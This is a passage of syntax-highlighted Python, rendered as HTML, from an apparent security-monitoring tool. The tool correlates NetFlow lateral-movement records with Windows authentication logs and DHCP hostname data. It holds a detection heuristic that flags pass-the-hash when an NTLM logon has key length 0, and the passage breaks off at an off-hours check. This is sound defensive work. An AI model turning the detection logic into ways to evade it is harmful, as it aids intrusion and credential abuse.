style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[+] NetFlow: loaded </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">self</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token string-interpolation interpolation\">netflow_events</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> lateral-movement-port records\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">load_auth_logs</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> csv_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"Load Windows authentication events.\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">open</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">csv_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> row </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> csv</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">DictReader</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">try</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">auth_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">fromisoformat</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_id'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">int</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_id'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'source_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'source_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'account'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'account'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'logon_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'logon_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">''</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'auth_pkg'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'auth_pkg'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">''</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'key_length'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'key_length'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">''</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'service'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'service'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">''</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">except</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ValueError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> KeyError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[+] Auth: loaded </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">self</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token string-interpolation interpolation\">auth_events</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> authentication events\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">correlate</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> time_window_seconds</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">30</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">        Main correlation: for each NetFlow lateral movement record,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">        find the corresponding auth event within the time window.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">        Enrich both with DHCP hostname resolution.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">        \"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        timeline </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> flow </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">sorted</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">netflow_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> key</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">lambda</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            flow_ts </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> flow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            src_ip  </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> flow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'src_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            dst_ip  </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> flow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Resolve IPs to hostnames using DHCP timeline</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            src_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> src_mac </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">resolve_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">src_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> flow_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            dst_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> dst_mac </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">resolve_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">dst_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> flow_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Find matching auth event within time window</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            matching_auth </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            window </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> timedelta</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">seconds</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">time_window_seconds</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> auth </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">auth_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">abs</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\"> flow_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">total_seconds</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> time_window_seconds</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'source_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> src_ip </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"> auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'logon_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'3'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'10'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        matching_auth </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> auth</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">break</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Determine if this is suspicious</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            suspicion_flags </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> matching_auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Pass-the-hash indicator</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">matching_auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'auth_pkg'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'NTLM'</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    matching_auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'key_length'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'0'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    suspicion_flags</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'PASS_THE_HASH'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Off-hours activity (midnight to 5am)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                